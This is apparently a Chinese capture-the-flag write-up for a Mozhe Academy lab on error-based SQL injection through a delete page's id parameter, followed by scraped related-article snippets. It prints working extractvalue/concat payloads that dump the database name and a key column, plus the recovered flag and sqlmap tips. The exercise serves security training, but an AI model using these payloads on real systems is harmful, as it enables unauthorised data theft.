墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)
0x00.题目描述:
背景介绍
最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。
实训目标
1、熟练掌握留言板的工作原理;
2、善用burp抓取数据包;
解题方向
抓取数据包加以分析。
0x01.解题思路:
靶场环境:
主界面
查看删除链接为:http://219.153.49.228:45611/sqli_del.php?id=65
经过测试,确定注入点在删除页面的URL链接的id参数中,在浏览器中测得可由报错注入来爆库.
手工注入:
报错注入,来进行爆库:
首先是爆数据库名:
payload:http://219.153.49.228:45611/sqli_del.php?id=1 and extractvalue(1,concat('~',(select database())))
爆数据库名
接下来就是爆表名,列名以及字段了。
爆数据库表名
爆列名
接下来是爆字段:
有几个要注意的地方:第一是在测试注入点时,可能会把已有的key值删除,出现这种情况,需要将靶场重启;第二是key这是mysql系统的保留关键字,故而要查询时必须加反单引号;第三时爆字段长度发现没有32位,可以用先正常爆字段,再用right函数爆右边的32位,两个结果拼接得到flag~
payload1(正常爆字段):http://219.153.49.228:47995/sqli_del.php?id=6 and extractvalue(1,concat('~',(select group_concat(`key`) from message)))
response1:mozhe05ed568a089b3a1b6698075af6
payload2(right函数爆右边字段):http://219.153.49.228:47995/sqli_del.php?id=6 and extractvalue(1,concat('~',right((select group_concat(`key`) from message),32)))
response2:ozhe05ed568a089b3a1b6698075af6d
拼接得到最终的key:mozhe05ed568a089b3a1b6698075af6d
sqlmap注入:
sqlmap注入的话,将删除链接丢进去跑就可以了,但是要注意id的值要换成一个不存在的值,不然的话第一次注入成功,key值也就被删了。
0x02.总结:
1.这题不知道为什么用burpsuite不能进行注入,在浏览器中地址栏可以。
2.key以及MySQL数据库的保留关键字要进行查询的话,要用反单引号括起来。
3.right函数可以在爆字段位数不够时使用。
墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)相关推荐
- 为什么preparedstatement能防止sql注入_使用Python防止SQL注入攻击的实现示例
文章背景 每隔几年,开放式Web应用程序安全项目就会对最关键的Web应用程序安全风险进行排名.自第一次报告以来,注入风险高居其位!在所有注入类型中,SQL注入是最常见的攻击手段之一,而且是最危险的.由 ...
- sql 整改措施 注入_记一次Sql注入 解决方案
老大反馈代码里面存在sql注入,这个漏洞会导致系统遭受攻击,定位到对应的代码,如下图所示 image like 进行了一个字符串拼接,正常的情况下,前端传一个 cxk 过来,那么执行的sql就是 se ...
- WEB漏洞测试——HTML注入及XSS注入
HTML注入 原理 目前我们所接触展示页面基本上都是由html来实现的,那么后台在处理内容的时候,是对html很少处理的,如果用户刻意通过输入框.文本框.查询框来填写html.js代码(脚本注入),那 ...
- mysql exp 注入_使用exp进行SQL报错注入
0x01 前言概述 好消息好消息-作者又在MySQL中发现了一个Double型数据溢出.如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error bas ...
- 极客学院mysql教程_干货分享 速成必备视频 六天带你玩转MySQL视频教程 数据库......
├─mysql第一天 │ └─video4 p7 v* M+ D& s │ 01数据库课程介绍.mp4 │ 02数据库(基础知识).mp45 X# y2 ...
- 1000并发 MySQL数据库_再送一波干货,测试2000线程并发下同时查询1000万条数据库表及索引优化...
继上篇文章<绝对干货,教你4分钟插入1000万条数据到mysql数据库表,快快进来>发布后在博客园首页展示得到了挺多的阅读量,我这篇文章就是对上篇文章的千万级数据库表在高并发访问下如何进行 ...
- java代码执行mysql语句_三种执行SQL语句的的JAVA代码
问题描述: 连接数据库,执行SQL语句是必不可少的,下面给出了三种执行不通SQL语句的方法. 1.简单的Statement执行SQL语句.有SQL注入,一般不使用. public static voi ...
- dagger2 注入_使用Dagger 2在GWT中进行依赖注入
dagger2 注入 依赖注入是一种软件开发概念,其中为对象提供了创建所需的所有对象或值. GWT用户已经熟悉GIN,但已经不推荐使用此工具,因此不再支持它,因此使用GIN的应用程序当前确实需要告别. ...
- isql 测试mysql连接_[libco] 协程库学习,测试连接 mysql
历史原因,一直使用 libev 作为服务底层:异步框架虽然性能比较高,但新人学习和使用门槛非常高,而且串行的逻辑被打散为状态机,这也会严重影响生产效率. 用同步方式实现异步功能,既保证了异步性能优势, ...
最新文章
- 关于Android加载的优化
- [Python爬虫] scrapy爬虫系列 一.安装及入门介绍
- antd 表格树如何展开_ant-design-pro protable 树形表格默认展开
- 安装mysql显示有5.0_安装MySQL5.0时到如图这一步提示出错了,~
- 哔哩哔哩修改视频速度
- Python基础——mysql数据库、SQLAlchemy
- javascript option 菜单图标_善用 CSS,不用 JavaScript 也能写出这些元素
- 利用PyInstaller打包exe文件
- 非模式生物KEGG富集分析: clusterProfiler
- 守望先锋游戏反外挂技术测评
- Calib 工具说明
- Unity Shader 之 环境光
- 服务器七雄争霸官方网站,七雄争霸特效城堡半价购买 全新服务器等您来挑战...
- Relief特征提取算法实战
- Windows 10强制升级惹众怒:纽约总检察长正在积极推动诉讼
- 13款用于拍摄全景照片的iOS应用
- 1M带宽、1Mbps、1Mb/s 区分
- 再看《蜂蜜与四叶草》
- c语言指针near,C语言中 near指针和far指针
- Java基础语法等等